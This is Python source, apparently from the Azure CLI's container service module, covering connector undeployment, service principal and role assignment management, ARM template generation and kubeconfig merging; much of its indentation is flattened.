_undeploy_connector(graceful, node_name, helm_release_name)
if os_type.lower() in ['windows', 'both']:
helm_release_name = connector_name.lower() + '-windows-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
def _undeploy_connector(graceful, node_name, helm_release_name):
if graceful:
logger.warning('Graceful option selected, will try to drain the node first')
from subprocess import PIPE, Popen
kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.'
try:
Popen(["kubectl"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(kubectl_not_installed)
try:
drain_node = subprocess.check_output(
['kubectl', 'drain', node_name, '--force', '--delete-local-data'],
universal_newlines=True)
if not drain_node:
raise CLIError('Could not find the node, make sure you' +
' are using the correct --os-type')
except subprocess.CalledProcessError as err:
raise CLIError('Could not find the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
logger.warning("Undeploying the '%s' using Helm", helm_release_name)
try:
subprocess.call(['helm', 'del', helm_release_name, '--purge'])
except subprocess.CalledProcessError as err:
raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err))
try:
subprocess.check_output(
['kubectl', 'delete', 'node', node_name],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not delete the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
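# Editor's note: _get_role_property smooths over the two shapes a role assignment can
# take here (SDK model object vs. plain dict). A hypothetical illustration:
#
#     _get_role_property({'scope': '/subscriptions/0000'}, 'scope')  # -> '/subscriptions/0000'
#     # For an SDK model object the same call falls back to getattr(obj, 'scope').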
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
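# Editor's note -- an illustrative example of the prefix built above (all values hypothetical):
# _get_default_dns_prefix('myCluster!', 'my-rg', '0b1f6471-aaaa-bbbb-cccc-000000000000')
# would yield 'myCluster-my-rg-0b1f64': the name is stripped of characters outside
# [A-Za-z0-9-] and cut to 10 chars (prefixed with 'a' if it doesn't start with a letter),
# the resource group is cut to 16 chars, and only the first 6 chars of the subscription
# id are appended.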
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
    'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
    :param admin_password: The administration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
    # The resources.properties fields should match the ContainerService API model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
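# Editor's note -- for reference, the acsServicePrincipal.json file read above (and written
# by store_acs_service_principal) is keyed by subscription id, roughly:
#
#     {
#         "<subscription-id>": {
#             "service_principal": "<app id>",
#             "client_secret": "<secret>"
#         }
#     }
#
# The placeholder values are illustrative; only keys present at store time are written.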
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)
if validate:
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
    # TODO: this only works for the public cloud; national clouds need separate handling
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
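# Editor's note -- a hypothetical call to the helper above, as used for the octarine proxy id:
#
#     proxy_id = _rand_str(16)   # e.g. 'q3h7x0z9k2m5a8d1': 16 chars drawn from [a-z0-9]
#
# The exact value is random; only the length and alphabet are fixed.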
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
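# Editor's note: on Python 3.2+ the helper above is roughly equivalent to
# os.makedirs(path, exist_ok=True); the try/except form is kept as written.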
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
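# Editor's note -- a minimal sketch of the tuple returned above (values hypothetical):
# _build_application_creds(password='s3cret') gives ([PasswordCredential(...)], None),
# valid from utcnow for one year by default, while passing key_value instead gives
# (None, [KeyCredential(...)]) with type 'AsymmetricX509Cert' and usage 'Verify'.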
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
    # If the cluster has a service principal, resolve the service principal client id to get the object id;
    # if not, use the MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
